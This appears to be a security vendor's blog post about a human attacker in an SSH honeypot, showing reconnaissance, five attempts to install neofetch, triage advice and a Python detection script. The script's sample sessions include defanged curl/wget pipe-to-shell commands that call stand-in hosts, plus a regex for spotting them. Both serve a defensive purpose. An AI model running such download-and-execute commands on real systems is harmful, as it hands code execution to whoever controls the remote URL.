It wasn't a bot: it was a person
The clue is in the SSH client. Most of the attacks we see come from automated libraries that announce themselves. This session arrived from Bitvise SSH Client (Tunnelier) 9.61 — a graphical Windows client. There was someone behind the keyboard.
They logged in as root with the password admin123. A weak credential, tried by hand, that worked against the decoy. And what they did next looks nothing like a script: it looks like a person poking around.
First, the reconnaissance
The first command was a burst of system reconnaissance on a single line — who am I, what CPU, how much RAM, how much disk, how long it's been up:
So far, normal. Reconnaissance is the first step of almost any intrusion. The interesting part is what came next: instead of installing a miner, a bot or a backdoor, our visitor wanted something far more vain.
Five attempts to install neofetch
neofetch is a tool that draws the system logo and its specs in color — the typical "look at my machine" screenshot. And this person was determined to run it. When one method failed in the isolated environment, they tried another:
Five routes to the same trivial goal. A bot doesn't do that — a bot runs its recipe and leaves. This is someone troubleshooting live, getting frustrated with a system that wasn't giving back what they expected.
Why we still flag it as critical
The second attempt is the reason. curl ... | bash downloads a script from a URL and pipes it straight into a shell: nothing is written to disk and there is no chance to review it. The honeypot captured the real content: a 368 KB shell script. It turned out to be the legitimate neofetch. But we didn't know that until we captured it — and that's exactly the point.
The curl | bash pattern is dangerous by design, not because of the specific payload. Whoever controls that URL decides what runs on your machine, today and tomorrow. Today it was neofetch; one change on the remote server and tomorrow it's something else. That's why it's flagged critical regardless of what it returns: the risk is the mechanism, not the file.
The trail: where it came from
The connection came from infrastructure in Istanbul (ArvanCloud, AS57568), at 18:39 local time — 15:39 UTC. An afternoon: a plausible time for a person, not for a cron job. An important nuance, with no embellishment: that's the origin of the infrastructure, not necessarily where the person typing is. ArvanCloud is hosting/CDN and may well be an intermediate hop.
The most revealing cross-reference: 65% of the traffic comes from hosting in the Netherlands — cheap bot farms replicating the same sweep over and over. The person in this session didn't come from there: they came from Istanbul, outside the focus of the noise. Two worlds in the same decoy.
sha256: 2a272bbaa1275f21835fd3258fb8032ccdc98348e6ccb9cf58acacd366340170
shell script · 368 KB · neofetch (MIT, legitimate). The full hash lets you verify that what was downloaded was the real neofetch and not an impostor with the same name. It's what separates "it looked harmless" from "we checked it".
And here's the number that puts this in context: the sessions that arrive with a desktop client (Bitvise, PuTTY) number 1,409 of 268,155 — barely 0.5% of the traffic. The vast majority are headless libraries repeating a recipe. This one had someone deciding live.
And a cross-reference that puts neofetch in its place: across the 268,155 sessions in the corpus, the #1 command is uname (106,796 times), and the podium is dominated by hardware reconnaissance — grep, lspci, nvidia-smi. This person just wanted the pretty version of what almost everyone does right after getting in: figuring out what machine they've landed on. The difference is that they tried it five times, by hand.
Human vs bot: why the difference matters
Separating human sessions from automated ones changes how you prioritize. Three signals that gave this person away:
- Graphical desktop client: botnets use headless libraries, not Bitvise Tunnelier on Windows.
- Varied retries: five methods for the same goal = a person adapting, not a script repeating a fixed recipe.
- A goal with no monetization value: showing off specs doesn't install a miner or steal anything. It's exploratory behavior, almost out of curiosity.
A human attacker changes the risk calculation: they improvise, they try what you didn't expect, and sometimes they come back. Treating every intrusion as automated noise makes you miss exactly the ones with a person behind them.
What to do
- Block curl … | bash and wget … | sh in SSH sessions: no legitimate maintenance needs to download-and-run in a single command.
- Treat a root login from a desktop SSH client as a high signal: it's a human-operator pattern, not a mass sweep.
- Capture the downloaded content, not just the URL: the URL looked harmless (GitHub); the value is in having the binary to verify what it really was.
- Credentials like admin123 still open doors: the human factor on the other side tries exactly the ones a tired team leaves in place.
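As an added example (not the post's own tooling), the three signals from the previous section and the rules in the list above turned into triage logic over session records, plus the hash check described for the captured download. The session records, client banners and field names below are constructed for illustration.

```python
import hashlib
import hmac
import re

# Constructed sample session records (not the post's raw data). Field names
# are an assumption: SSH client banner, login user, commands typed.
SESSIONS = [
    {"id": "s1", "client": "SSH-2.0-Bitvise SSH Client (Tunnelier) 9.61", "user": "root",
     "commands": ["whoami; nproc; free -m; df -h; uptime",
                  "curl -fsSL hxxps://example[.]invalid/neofetch | bash"]},
    {"id": "s2", "client": "SSH-2.0-libssh_0.9.6", "user": "root",
     "commands": ["uname -a", "cat /proc/cpuinfo | grep name"]},
    {"id": "s3", "client": "SSH-2.0-paramiko_3.4.0", "user": "admin",
     "commands": ["wget -qO- hxxp://example[.]invalid/x.sh | sh"]},
    {"id": "s4", "client": "SSH-2.0-PuTTY_Release_0.81", "user": "admin",
     "commands": ["ls -la"]},
]

# Banners of interactive desktop clients; anything else is treated as headless.
DESKTOP_CLIENTS = ("Bitvise", "Tunnelier", "PuTTY")

# "download and run in one command": curl/wget output piped into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")

def is_desktop_client(banner):
    return any(name in banner for name in DESKTOP_CLIENTS)

def pipe_to_shell_commands(commands):
    return [c for c in commands if PIPE_TO_SHELL.search(c)]

def triage(session):
    """Return (severity, reasons): pipe-to-shell is critical whatever the payload;
    a root login from a desktop client is a high (human-operator) signal;
    everything else is baseline sweep noise."""
    reasons, severity = [], "low"
    if pipe_to_shell_commands(session["commands"]):
        severity = "critical"
        reasons.append("download-and-run in one command")
    if is_desktop_client(session["client"]) and session["user"] == "root":
        severity = "critical" if severity == "critical" else "high"
        reasons.append("root login from desktop SSH client (likely human)")
    return severity, reasons

def sha256_hex(content):
    return hashlib.sha256(content).hexdigest()

def verify_capture(content, expected_sha256):
    """Compare the captured download against a known-good hash (constant time)."""
    return hmac.compare_digest(sha256_hex(content), expected_sha256.lower())
```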
What's valuable about this session isn't neofetch. It's the reminder that, beneath the figures, there are people making decisions in real time. For years we've treated intrusions as automated noise. A well-placed decoy is where you finally see the adversary — not their log, them.
CipherSentry deploys an SSH decoy that captures every real command and every real download, isolates them and shows them to you on a dashboard. We watched this person install neofetch five times; you'll see whoever knocks on your door.
Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure. IP and URLs obfuscated ([.], hxxp) to prevent accidental clicks.
honeypot CipherSentry · session 9d00286f · IP 194.5.[REDACTED].238 · 2026-06-17 · context: 268,155 sessions / 1,169 IPs